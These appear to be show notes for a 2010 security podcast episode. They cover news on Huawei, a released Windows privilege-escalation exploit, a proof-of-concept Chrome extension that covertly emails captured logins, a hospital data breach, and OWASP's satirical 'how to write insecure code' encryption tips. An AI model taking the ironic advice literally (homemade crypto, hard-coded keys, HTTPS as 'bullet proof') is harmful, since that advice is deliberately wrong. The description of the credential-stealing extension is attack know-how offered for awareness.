ISDPodcast Episode 170 for July 12, 2010. In this episode we will discuss Huawei, MSRC, Chrome, Lincoln Medical & OWASP tips. This podcast was hosted by Rick Hayes and the intern, Karthik Rangarajan.
Announcements:
MyHardDriveDied.com:
- MHDD Data Recovery Class current dates and locations:
- Dallas, TX – October 11th – 15th
- SANS: Drive and Data Recovery Forensics Sep 20th-24th (Mon-Fri) (https://www.sans.org/registration/register.php?conferenceid=21967)
- Washington, DC – December 6th – 10th
- Cost is $3500 for all classes to reserve and register, call (678) 445-9007, email: smoulton@nicservices.com or go to http://www.myharddrivedied.com Use the Discount Code: isdpodcast for a $300 discount.
SANS Mentoring Program:
- Jason Lawrence will also be putting on the SANS Mentor Forensics 508 – Computer Forensics and Investigations course in Sandy Springs starting Tuesday, October 12, 2010 – Tuesday, December 14, 2010 (http://www.sans.org/mentor/details.php?nid=21538). Use the Discount Code: isdpod15 for a 15% discount.
Atlanta ISSA:
- ISSA International Conference – September 16, 2010 (http://www.issa.org/page/?p=105)
- SANS 560: Network Penetration Testing and Ethical Hacking – September 17-22, 2010 (http://www.sans.org/atlanta-2010-cs2/description.php?tid=3142)
- SANS 577: Virtualization Security Fundamentals – September 17 & 18 (http://www.sans.org/atlanta-2010-cs2/description.php?tid=3807)
9am-5pm US ET
Hilton Atlanta Airport Hotel
1031 Virginia Avenue
Atlanta, GA 30354
The Louisville Metro InfoSec Conference
Thursday, October 7th, 2010 at Churchill Downs (http://www.louisvilleinfosec.com)
Registration’s made between now and July 16th, 2010 receive a 50% DISCOUNT on the $99 ticket price! After July 16th the ticket price will go back to normal.
Friends of the Podcast:
Webhosting services:WebSpeedway
Stories of Interest:
Updates:
Corrections:
News Item 1a:http://www.totaltele.com/view.aspx?ID=456959
Chinese vendor working on wireless broadband deal with U.S. operator in bid to further its North American ambitions. Huawei is bidding to sell mobile network equipment to U.S. operator Sprint Nextel, despite security concerns from the U.S. government regarding Chinese equipment makers, according to a press report.
Citing unnamed sources, the Financial Times late Thursday reported that the Chinese vendor is driving to secure its first major U.S. contract. If successful it will sell mobile broadband network kit to Sprint Nextel, the paper said.
Sprint Nextel offers mobile broadband services via what it terms its 4G network, which is based on WiMAX technology. The press report did not explicitly state that the deal Huawei is working on is for WiMAX equipment. Furthermore, the FT did not report that Huawei already supplies WiMAX equipment to Sprint’s partner Clearwire in the U.S.
News Item 1b: http://www.fiercewireless.com/story/hauwei-hires-u-s-advisers-alleviate-security-concerns/2010-07-12
News item 2: http://news.softpedia.com/news/Upset-Security-Researchers-Start-Releasing-Microsoft-0Days-146251.shtml
A group of security researchers calling themselves the Microsoft-Spurned Researcher Collective (MSRC) have released full details and exploitation code for an unpatched Windows local privilege escalation vulnerability. The researchers openly stated that they will continue to do so in response to how Microsoft treated Tavis Ormany, the Google engineer blamed for disclosing a critical Windows bug publicly last month.
The name is clearly a pun directed at Microsoft’s Security Response Center (MSRC), while Tavis Ormandy is the Google engineer who disclosed the Windows XP Help Center vulnerability that is currently being exploited in the wild. Ormandy has taken a lot of heat from both Microsoft and from others in the security community for publishing details about an unpatched critical vulnerability in the public domain.
According to Security Focus, the bug exposed by the so called “Microsoft-Spurned Researcher Collective” can lead to local privilege escalation. “An attacker may exploit this issue to execute arbitrary code with kernel-level privileges, however, this has not been confirmed. Successful exploits will result in the complete compromise of affected computers,” the Security Focus advisory reads.
The upset security researchers poke more fun at Microsoft in its disclosure. For example their workaround section tells the company to locate the HKCU\Microsoft\Windows\CurrentVersion\Security registry key and change the “OurJob” boolean value to FALSE. They even include an email address that others willing to join the cause can use to make contact.
News Item 3: http://thenextweb.com/google/2010/07/09/hacker-creates-plugin-that-trashes-chromes-security
An exploit, developed by programmer Andreas Grech, employs a plugin coded using jQuery to track users’ login information and have it emailed to himself. He claims that he has tested the plugin, and that it has been successful against Twitter, Gmail, and Facebook. In his own words,
The Google Chrome browser allows the installation of third-party extensions that are used to extend the browser to add new features. The extensions are written in JavaScript and HTML and allow manipulation of the DOM, amongst other features.
By allowing access to the DOM, an attacker can thus read form fields…including username and password fields. This is what sparked my idea of creating this PoC.
The extension I present here is very simple. Whenever a user submits a form, it tries to capture the username and password fields, sends me an email via an Ajax call to a script with these login details along with the url and then proceeds to submit the form normally as to avoid detection.
He has included the code for the plug-in on his website.
News item 4:http://www.theregister.co.uk/2010/06/30/patient_data_exposed/
New York-based Lincoln Medical and Mental Health Center has become one of the latest medical providers to expose highly sensitive patient data after CDs containing unencrypted data sent by FedEx never made it to their destination.
The breach exposed medical and psychological diagnoses and procedures for 130,495 patients, according to a posted Tuesday. The CDs, which remain missing despite an investigation that was launched in early April, also contained names, addresses, social security numbers medical record numbers, dates of birth and other details that are regularly snarfed up by identity thieves.
In a letter sent to affected patients, hospital officials said they have no knowledge the missing information has been accessed by anyone.
Lincoln’s notification to the US Department of Health website came the same day officials at the University of Maine said sensitive details for 4,585 individuals who sought services at the school’s counseling center have been stolen by hackers who compromised two servers. The exposed data included names, clinical information and social security numbers for people who used the service over an eight-year span ending last week.
News item 5: http://www.owasp.org/index.php/How_to_write_insecure_code
Continuing our coverage of the OWASP “How to write insecure code” with Encryption
Build your own encryption scheme
The standard encryption mechanisms are way too complicated to use. It’s much easier to make up an encryption algorithm that scrambles up secret stuff. You don’t need to bother with a key or anything, just mix it all up and nobody will figure it out.
Hard-code your keys
Hard-coding is the best way to retain control. This way those pesky operations folks won’t be able to monkey with (they say “rotate”) the keys, and they’ll be locked into the source code where only smart people can understand them. This will also make it easier to move from environment to environment as the hard-coded key will be the same everywhere. This in turn means your code is secure everywhere.
Smart coders don’t read manuals
Just keep adding bytes until the algorithm stops throwing exceptions. Or just save yourself time and cut-and-paste from a popular coding site. This looks like a good start: byte[] keyBytes = new byte[] { 0×00, 0×01, 0×02, 0×03, 0×04, 0×05, 0×06, 0×07, 0×08, 0×09, 0x0a, 0x0b, 0x0c, 0x0d, 0x0e, 0x0f, 0×10, 0×11, 0×12, 0×13, 0×14, 0×15, 0×16, 0×17 };
Pack up your sensitive payload
If you need to pass things that are sensitive, like passwords or PII, just pack it up in an encrypted blob. Then just email the key to the developer who is coding the other side of the transaction, and punch out early. This will also get you past Data Loss Prevention (DLP) tools which is a huge bonus.
Encryption is hard
A great way to improve the security posture of your site is to use client-side JavaScript to encrypt passwords and other sensitive data that are submitted. This can be used with or without HTTPS (TLS/SSL). If you use it without HTTPS, you can save some money by skipping the annual purchase of a signed third party certificate.
HTTPS makes your application bullet proof
If you use HTTPS encryption between your web application endpoint and the client, there is absolutely no way for anyone to steal any of the data that is transmitted.
